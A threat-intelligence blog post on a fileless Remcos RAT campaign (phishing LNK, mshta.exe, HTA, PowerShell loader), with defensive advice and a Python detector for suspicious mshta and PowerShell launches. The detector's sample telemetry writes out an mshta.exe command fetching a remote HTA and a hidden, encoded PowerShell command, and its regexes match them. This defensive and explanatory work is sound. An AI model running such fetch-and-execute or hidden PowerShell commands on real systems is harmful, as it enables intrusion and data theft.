The Invisible File
- Javier Conejo del Cerro
- 12 minutes ago
- 2 min read

A Stealthy Threat Returns
In the ever-evolving landscape of cyber threats, stealth has become one of the most valuable weapons in a threat actor's arsenal. Recently, security researchers documented a new campaign delivering the Remcos Remote Access Trojan (RAT) that combines phishing emails with fileless execution to compromise Windows systems. The chain uses a malicious LNK shortcut, an HTML Application (HTA) run through mshta.exe, and a PowerShell loader; only the shortcut and a decoy document touch disk, while the loader and the RAT itself run in memory, which is what lets the payload slip past file-based security controls.
Those who can’t see it
The campaign primarily targets users in sectors where documents and administrative forms are part of daily operations—such as finance departments, HR staff, government clerks, and IT administrators. These users often deal with attachments and system-level scripts, making them ideal targets for phishing emails with LNKs posing as tax or invoice files.
Once a host is infected, the operators can use the RAT to move laterally within the organization, silently siphoning off sensitive documents, login credentials, and system metadata, jeopardizing not only individual devices but entire networks.
Untraced
The attack chain begins with a ZIP file attached to a phishing email, typically themed around taxes or invoices. Inside the ZIP is a malicious Windows shortcut (.lnk) disguised as a document. When the shortcut is opened, it launches mshta.exe, a legitimate, signed Microsoft binary (a classic living-off-the-land technique), passing it the URL of an obfuscated HTA file hosted on a remote server, which mshta.exe fetches and runs.
That HTA contains embedded VBScript that downloads and executes several components: a decoy PDF shown to the victim, a second HTA, and a PowerShell script. The PowerShell script decodes and reconstructs a shellcode loader in memory, which in turn starts the Remcos RAT. The RAT binary itself is never written to disk.
Remcos RAT, a modular 32-bit malware written in C++, provides attackers with full remote control over infected systems. It can:
Harvest credentials
Log keystrokes
Monitor clipboard activity
Capture screenshots
List installed software and active processes
Exfiltrate data through TLS-encrypted communication channels
By keeping the payload in memory, the RAT leaves little on disk for signature-based antivirus to scan and for post-incident disk forensics to recover; the evidence lives in process telemetry, memory, and network traffic instead.
Spotting the unspotted
This campaign underscores the critical need for modern, layered defenses that go beyond traditional antivirus. Organizations should:
Block or constrain mshta.exe and HTA execution (for example with AppLocker or WDAC rules) and restrict PowerShell with policies such as Constrained Language Mode, so that untrusted scripts cannot run.
Monitor for mshta.exe launched with a remote URL or inline script, mshta.exe spawning PowerShell, and PowerShell started with a hidden window or an encoded command.
Employ advanced email filtering that flags suspicious LNK and ZIP attachments.
Use Endpoint Detection and Response (EDR) systems with behavioral analysis, since file scanning alone will miss an in-memory payload.
Regularly audit registry changes and startup configurations for persistence indicators.
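The monitoring rules above, applied to process-creation telemetry, as an added example in Python that is not part of the original post or of any EDR product. It walks a small set of constructed Sysmon-style events (parent and child PIDs, image path, command line) and flags the mshta.exe and PowerShell behaviours of the LNK to HTA to PowerShell chain described earlier, while leaving a local HTA and a scripted backup job alone. The field names, PIDs, IP address, paths and command lines are all assumptions made up for the sample.

```python
import re
from collections import namedtuple

# Minimal process-creation record, modelled on the fields a Sysmon Event ID 1
# (or any EDR) log exposes. The field names are an assumption for this example.
Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed sample telemetry (not real data): a shortcut double-click in
# explorer.exe starts mshta.exe against a remote HTA, which spawns a hidden,
# encoded PowerShell, next to two benign uses of the same binaries.
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\mshta.exe",
          "mshta.exe https://203.0.113.10/invoice.hta"),
    Event(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgA"),
    Event(400, 100, r"C:\Windows\System32\mshta.exe",
          r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    Event(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"),
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}

# mshta.exe given a URL, or an inline javascript:/vbscript: payload, instead of a local .hta
MSHTA_REMOTE = re.compile(r"(?i)(?:https?://|\b(?:javascript|vbscript):)")
# PowerShell accepts unambiguous prefixes of -EncodedCommand; this covers the common spellings
PS_ENCODED = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?(?=\s)")
# -W Hidden / -WindowStyle Hidden
PS_HIDDEN = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b")


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield parent, grandparent, ... of an event. Stops when the parent was
    never logged (started before telemetry) or when PIDs form a cycle (reuse)."""
    seen = {event.pid}
    parent = by_pid.get(event.ppid)
    while parent is not None and parent.pid not in seen:
        yield parent
        seen.add(parent.pid)
        parent = by_pid.get(parent.ppid)


def detect(events):
    """Return (pid, reason) alerts for the mshta.exe / PowerShell behaviours
    of the LNK -> HTA -> PowerShell chain, in event order."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        name = basename(ev.image)
        chain = [basename(a.image) for a in ancestors(ev, by_pid)]
        if name == "mshta.exe" and MSHTA_REMOTE.search(ev.cmdline):
            alerts.append((ev.pid, "mshta.exe executing remote or inline HTA content"))
        if name in POWERSHELL:
            if "mshta.exe" in chain:
                alerts.append((ev.pid, "PowerShell descended from mshta.exe"))
            if PS_ENCODED.search(ev.cmdline) or PS_HIDDEN.search(ev.cmdline):
                alerts.append((ev.pid, "PowerShell with encoded command or hidden window"))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

Run against the sample, the script raises three alerts: one for the mshta.exe process fetching the remote HTA and two for the PowerShell child (its mshta.exe ancestry, and its hidden, encoded command line). The local setup.hta and the backup script produce nothing, which is the point of keying on the parent chain and the remote URL rather than on the binaries alone. In a real deployment the same logic would run over your EDR's process-creation stream rather than an in-memory list.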
The resurgence of Remcos RAT in a fileless format illustrates how even well-known malware strains can be retooled to bypass modern defenses. With phishing lures tailored to business routines and execution methods that avoid leaving traces, campaigns like this remind us that cyber hygiene must evolve with the threat landscape.
Stay vigilant. The intruder may be invisible, but the consequences are very real.